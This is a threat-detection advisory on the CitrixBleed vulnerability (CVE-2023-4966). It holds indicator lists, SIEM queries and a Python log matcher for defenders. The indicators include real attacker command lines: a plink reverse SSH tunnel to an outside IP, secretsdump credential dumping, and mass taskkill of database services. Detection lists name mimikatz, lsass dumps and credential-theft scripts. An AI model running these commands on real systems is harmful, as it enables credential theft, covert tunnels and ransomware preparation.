CitrixBleed (CVE-2023-4966) - Detections

    Date: 09/17/2024

    Severity: High

    Summary

    Citrix Bleed (CVE-2023-4966) is a critical information disclosure vulnerability impacting Citrix NetScaler Gateway and NetScaler ADC products, with a CVSS score of 9.4. Citrix addressed this issue with a patch released on October 10, 2023. This vulnerability enables unauthenticated attackers to extract session tokens through a specially crafted request, potentially gaining unauthorized access to affected systems. Additionally, security firm Assetnote has published detailed information and proof of concept (PoC) code for exploiting this vulnerability.

    Indicators of Compromise (IOC) List

    URL/Domain

    http://81.19.135.219/f8ptz87fe8djwqe.hta

    https://adobe-us-updatefiles.digital/index.php

    adobe-us-updatefiles.digital

    IP Address


    Hash


    Process creations

    C:\Users\Public\Documents\s.exe

    C:\Users\Public\Documents\dsquery.exe

    C:\Users\Public\Documents\dsget.exe

    C:\Users\Public\Libraries\7z2301-x64.exe

    C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi

    C:\Users\Public\Libraries\python-3.12.0-amd64.exe

    Commandline

    123.ps1

    Plink.exe

    AnyDeskMSI.exe

    SRUtility.exe

    netscan.exe

    cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1

    cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1

    cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1

    cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex

    cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1

    secretsdump.py <domain>/<username>@<ip> -outputfile 1

    echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>


    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    URL/Domain

    userdomainname like "http://81.19.135.219/f8ptz87fe8djwqe.hta" or url like "http://81.19.135.219/f8ptz87fe8djwqe.hta" or userdomainname like "https://adobe-us-updatefiles.digital/index.php" or url like "https://adobe-us-updatefiles.digital/index.php" or userdomainname like "adobe-us-updatefiles.digital" or url like "adobe-us-updatefiles.digital"

    IP Address

    dstipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or ipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or publicipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1") or srcipaddress IN ("192.229.221.95","193.201.9.224","62.233.50.25","51.91.79.17","70.37.82.20","185.17.40.178","185.229.191.41","81.19.135.219","45.129.137.233","185.229.191.41","172.67.129.176","104.21.1.180","81.19.135.219","81.19.135.220","81.19.135.226","101.97.36.61","168.100.9.137","185.20.209.127","185.230.212.83","206.188.197.22","54.84.248.205","141.98.9.137","127.0.0.1")

    Hash

    sha256hash IN ("9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a","4c1346eab3fb23ca0613d73bbd2dd87fedb6ca8b1ba7bf48d69a57868d05854d","e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068","13d525588d2f6babe0b6de7d1456a6f3f39a0947128280a94b6f676dd5684201","09f7622eb9ed3bbd375575c8a190ff152ef3572a717a20c1b2dd5556b8cc9eba","906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6","17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994","005cfd8a4dd101c127bcb0f94f1fa143b24d91442ee9e1525b4c540c9fe88c63","cc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc90a63","ed5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a5c44","498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155","c06e320ad2568e15baae155346c6fb92e18fc038e7465adfb5fc2a3f8af9caa5")

    Detection Query 1

    (resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname In ("C:\Users\Public\Documents\s.exe","C:\Users\Public\Documents\dsquery.exe","C:\Users\Public\Documents\dsget.exe","C:\Users\Public\Libraries\7z2301-x64.exe","C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi","C:\Users\Public\Libraries\python-3.12.0-amd64.exe")

    Detection Query 2

    technologygroup = "EDR" AND newprocessname In ("C:\Users\Public\Documents\s.exe","C:\Users\Public\Documents\dsquery.exe","C:\Users\Public\Documents\dsget.exe","C:\Users\Public\Libraries\7z2301-x64.exe","C:\Users\Public\Libraries\mRemoteNG-Installer-1.76.20.24615.msi","C:\Users\Public\Libraries\python-3.12.0-amd64.exe")

    Detection Query 3

    (resourcename = "Windows Security"  AND eventtype = "4688"  ) AND newprocessname In ("Teamviewer","123.ps1","Plink.exe","AnyDeskMSI.exe","SRUtility.exe","netscan.exe","cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1","secretsdump.py <domain>/<username>@<ip> -outputfile 1","echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>")

    Detection Query 4

    technologygroup = "EDR" AND newprocessname In ("Teamviewer","123.ps1","Plink.exe","AnyDeskMSI.exe","SRUtility.exe","netscan.exe","cmd.exe /q /c cd 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c query user 1> \\127.0.0.1\admin$\__1698617793[.]44 2>&1","cmd.exe /q /c taskkill /f /im sqlwriter.exe /im winmysqladmin.exe /im w3sqlmgr.exe /im sqlwb.exe /im sqltob.exe /im sqlservr.exe /im sqlserver.exe /im sqlscan.exe /im sqlbrowser.exe /im sqlrep.exe /im sqlmangr.exe /im sqlexp3.exe /im sqlexp2.exe /im sqlex","cmd.exe /q /c cd \ 1> \\127.0.0.1\admin$\__1698618133[.]54 2>&1","secretsdump.py <domain>/<username>@<ip> -outputfile 1","echo enter | c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9[.]137 -pw <password>")
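    The matching logic behind Detection Queries 1 through 4, written here as an added Python example that is not Gurucul's code and not part of the original advisory, run over constructed 4688-style records. It refangs the published "[.]" values (which never match real logs as printed) and goes one step beyond the queries: the three admin$ redirection lines above differ only in their timestamp, so one pattern covers any timestamp. The record field names NewProcessName/CommandLine and the sample events are assumptions.

```python
import re

# Process paths from the page's "Process creations" list, lower-cased for case-insensitive matching.
SUSPICIOUS_PATHS = {
    r"c:\users\public\documents\s.exe",
    r"c:\users\public\documents\dsquery.exe",
    r"c:\users\public\documents\dsget.exe",
    r"c:\users\public\libraries\7z2301-x64.exe",
    r"c:\users\public\libraries\mremoteng-installer-1.76.20.24615.msi",
    r"c:\users\public\libraries\python-3.12.0-amd64.exe",
}
# Substrings from the page's "Commandline" list as published (defanged, trimmed), matched in CommandLine.
SUSPICIOUS_CMD_TOKENS = [
    "123.ps1", "plink.exe", "anydeskmsi.exe", "srutility.exe", "netscan.exe",
    "secretsdump.py", r"c:\windows\servicehost.exe -ssh -r", "168.100.9[.]137",
]
# Generalises the page's exact "1> \\127.0.0.1\admin$\__1698617793.44 2>&1" strings to any timestamp.
ADMIN_SHARE_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\admin\$\\__\d+\.\d+", re.IGNORECASE)

def refang(indicator: str) -> str:
    """Turn a published, defanged value ("168.100.9[.]137") back into a matchable one."""
    return indicator.replace("[.]", ".")

def match_event(event: dict) -> list:
    """Indicators hit by one 4688-style record; NewProcessName/CommandLine are assumed field names."""
    hits = []
    proc = event.get("NewProcessName", "").strip().lower()
    cmd = event.get("CommandLine", "").strip().lower()
    if proc in SUSPICIOUS_PATHS:
        hits.append("process_path:" + proc)
    for token in SUSPICIOUS_CMD_TOKENS:
        if refang(token) in cmd:
            hits.append("cmdline:" + token)
    if ADMIN_SHARE_REDIRECT.search(cmd):
        hits.append("cmdline:admin$_output_redirect")
    return hits

def scan(events: list) -> dict:
    """Map event index -> matched indicators for every event that hit at least one indicator."""
    return {i: h for i, e in enumerate(events) if (h := match_event(e))}

# Constructed sample records (not from the advisory): one hit of each kind plus one benign event.
SAMPLE_EVENTS = [
    {"NewProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /q /c whoami 1> \\127.0.0.1\admin$\__1700000000.12 2>&1"},
    {"NewProcessName": r"C:\Users\Public\Documents\s.exe", "CommandLine": "s.exe"},
    {"NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe readme.txt"},
    {"NewProcessName": r"C:\Windows\servicehost.exe", "CommandLine":
     r"c:\windows\servicehost.exe -ssh -r 8085:127.0.0.1:8085 <username>@168.100.9.137 -pw <password>"},
]
```

    Exact-string matches on the published command lines break on any trailing whitespace or timestamp change, which is why the matcher compares trimmed, lower-cased substrings and uses a pattern for the redirection filename.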

    Detection Query 5

    (resourcename in ("Windows Security" ) AND eventtype = "4663"  ) AND winmessage In ("Mag.dll","Adobelib.dll","c:\\users\\<username>\\downloads\\process hacker 2\\peview.exe","c:\\users\\<username>\\music\\process hacker 2\\processhacker.exe","psexesvc.exe","c:\\perflogs\\processhacker.exe","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe","c:\\perflogs\\lsass.dmp","c:\\users\\<username>\\downloads\\mimikatz.exe","c:\\users\\<username>\\desktop\\proc64\\proc.exe","c:\\users\\<username>\\documents\\veeam-get-creds.ps1","secretsdump.py","ad.ps1","c:\\perflogs\\64-bit\\netscan.exe","tniwinagent.exe","psexec.exe","7z.exe","c:\\perflogs\\1.exe","c:\\perflogs\\run.exe","c:\\perflogs\\64-bit\\m.exe","c:\\perflogs\\64-bit\\m0.exe","c:\\perflogs\\za_access_my_department.exe","c:\\users\\<username>\\music\\za_access_my_department.exe","c:\\windows\\servicehost.exe","c:\\windows\\sysconf.bat","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi")

    Detection Query 6

    technologygroup = "EDR" AND winmessage In ("Mag.dll","Adobelib.dll","c:\\users\\<username>\\downloads\\process hacker 2\\peview.exe","c:\\users\\<username>\\music\\process hacker 2\\processhacker.exe","psexesvc.exe","c:\\perflogs\\processhacker.exe","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe","c:\\perflogs\\lsass.dmp","c:\\users\\<username>\\downloads\\mimikatz.exe","c:\\users\\<username>\\desktop\\proc64\\proc.exe","c:\\users\\<username>\\documents\\veeam-get-creds.ps1","secretsdump.py","ad.ps1","c:\\perflogs\\64-bit\\netscan.exe","tniwinagent.exe","psexec.exe","7z.exe","c:\\perflogs\\1.exe","c:\\perflogs\\run.exe","c:\\perflogs\\64-bit\\m.exe","c:\\perflogs\\64-bit\\m0.exe","c:\\perflogs\\za_access_my_department.exe","c:\\users\\<username>\\music\\za_access_my_department.exe","c:\\windows\\servicehost.exe","c:\\windows\\sysconf.bat","c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi")

    Reference: 

    https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a

    https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomware-attacks-exploits

    https://unit42.paloaltonetworks.com/threat-brief-cve-2023-4966-netscaler-citrix-bleed

    https://www.tenable.com/cve/CVE-2023-4966 


    Tags

    CISA, Ransomware, CVE-2023, Exploit
